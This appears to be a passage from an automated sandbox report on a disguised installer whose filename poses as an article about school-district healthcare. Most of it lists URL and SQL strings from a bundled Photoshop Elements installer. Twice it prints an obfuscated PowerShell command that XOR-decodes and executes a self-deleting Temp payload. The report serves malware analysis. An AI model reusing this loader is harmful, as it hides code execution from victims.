| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-na1-stg1.adobelogin.com/imsj.prod |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3758086632.0000000004710000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmp, HDInstaller.log.10.dr | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v3?client_id=CC_HD_ESD_5_2&response_type=device&hashed_ |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765274666.0000000009700000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_excha |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B03000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange% |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Cop |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://ims-prod06.adobelogin.com |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-prod06.adobelogin.comcb |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ims-prod07.adobelogin.com |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://ims-prod07.adobelogin.comBaseUserProfilep8e-xo88uZdECZX33TmXbouglqWnMMEOY-gsf43446bc-7009-41 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-cops-dev.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-cops-stage.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-cops.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-cops.adobe.iohttps://lcs-cops-stage.adobe.iohttps://lcs-cops-dev.adobe.iohttps://lcs-ule |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-robs-dev.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-robs-stage.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-robs.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-ulecs-dev.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-ulecs-stage.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://lcs-ulecs.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.00000000099B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
| Source: index.html0.10.dr, index.html.10.dr | String found in binary or memory: https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEM |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmp | String found in binary or memory: https://www.innosetup.com/ |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmp | String found in binary or memory: https://www.remobjects.com/ps |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, PRIMARY KEY (payloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE payloads( PayloadID TEXT NOT NULL, productFamily TEXT ,productName TEXT , version TEXT , signature TEXT ,installState INT NOT NULL DEFAULT 0, installTime INT, PRIMARY KEY (PayloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, signature TEXT NOT NULL, PRIMARY KEY (payloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE DependencyData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PayloadIDb TEXT ,type TEXT NOT NULL ,product_family TEXT, product_name TEXT, version TEXT, PRIMARY KEY (PayloadID,PayloadIDb,type,product_family,product_name,version)); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE ribs_payload_constraint ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE CASCADE, payloadIDb TEXT NOT NULL, constraintType INTEGER NOT NULL, PRIMARY KEY (payloadID, payloadIDb, constraintType) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE payload_data ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (payloadID, domain, key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL , payloadIDUpgraded TEXT NOT NULL REFERENCES payloads (PayloadID), PRIMARY KEY (payloadIDOriginal, payloadIDUpgraded) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE SuitePayloads( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PRIMARY KEY (ProductID, PayloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL REFERENCES ribs_payload (payloadID), payloadIDUpgraded TEXT NOT NULL REFERENCES ribs_payload (payloadID), PRIMARY KEY (payloadIDOriginal) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE ribs_collection ( collectionID TEXT NOT NULL, collectionPayloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, tsInstalled INT, tsModified INT, PRIMARY KEY (collectionID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_version', 1); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS EULA_Ref( productID TEXT NOT NULL, langCode TEXT NOT NULL, eula_hash TEXT NOT NULL, PRIMARY KEY (productID, langCode) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE EULA_Files( productID TEXT NOT NULL, langCode TEXT NOT NULL,eula TEXT NOT NULL,PRIMARY KEY (productID, langCode) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE dependency_type( type INTEGER NOT NULL, description TEXT NOT NULL, PRIMARY KEY (type) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE ribs_collection_payload ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID) ON DELETE CASCADE, payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, installState INT NOT NULL DEFAULT 0, tsInstalled INTEGER, PRIMARY KEY (collectionID, payloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE Branding ( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),resource_type TEXT NOT NULL,resource_data TEXT NOT NULL,PRIMARY KEY (ProductID, resource_type) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: UPDATE pcd_meta SET value = 2 WHERE key = 'schema_version'; |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE dependencies( PayloadID TEXT NOT NULL REFERENCES payloads(PayloadID) ON DELETE CASCADE, PayloadIDb TEXT NOT NULL, type INTEGER NOT NULL REFERENCES dependency_types(type), PRIMARY KEY (PayloadID, PayloadIDb) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE payload_data ( PayloadID TEXT NOT NULL REFERENCES payloads (PayloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (PayloadID, domain, key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE Suites( ProductID TEXT NOT NULL, group_name TEXT NOT NULL, group_family TEXT NOT NULL, display_name TEXT NOT NULL, PRIMARY KEY (ProductID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE collection_data ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (collectionID, domain, key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE user_actions ( product_id TEXT NOT NULL, actor TEXT , time_action TEXT NOT NULL); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_version', 2); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_version', 3); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE PayloadData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),domain TEXT NOT NULL,key TEXT NOT NULL,value TEXT NOT NULL,PRIMARY KEY (PayloadID, domain, key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS EULA_Version(eula_hash TEXT NOT NULL, Version TEXT NOT NULL, Reserved TEXT, PRIMARY KEY (eula_hash)); |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: UPDATE upgraded_payloads SET payloadIDUpgraded = (SELECT second_upgraded.payloadIDUpgraded FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal WHERE upgraded_payloads.payloadIDOriginal = first_upgraded.payloadIDOriginal) WHERE payloadIDOriginal IN (SELECT first_upgraded.payloadIDOriginal FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE Payloads( PayloadID TEXT NOT NULL, payload_family TEXT NOT NULL,payload_name TEXT NOT NULL, payload_version TEXT NOT NULL,payload_type TEXT NOT NULL,PRIMARY KEY (PayloadID) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE domain_data ( domain TEXT NOT NULL, subDomain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (domain, subDomain, key) ); |
| Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS EULA_Content(eula_hash TEXT NOT NULL, Content TEXT NOT NULL, PRIMARY KEY (eula_hash)); |
| Source: unknown | Process created: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe "C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" | |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Process created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" | |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))" | |
| Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" | |
| Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Process created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1 | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Process created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))" | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Process created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1 | |
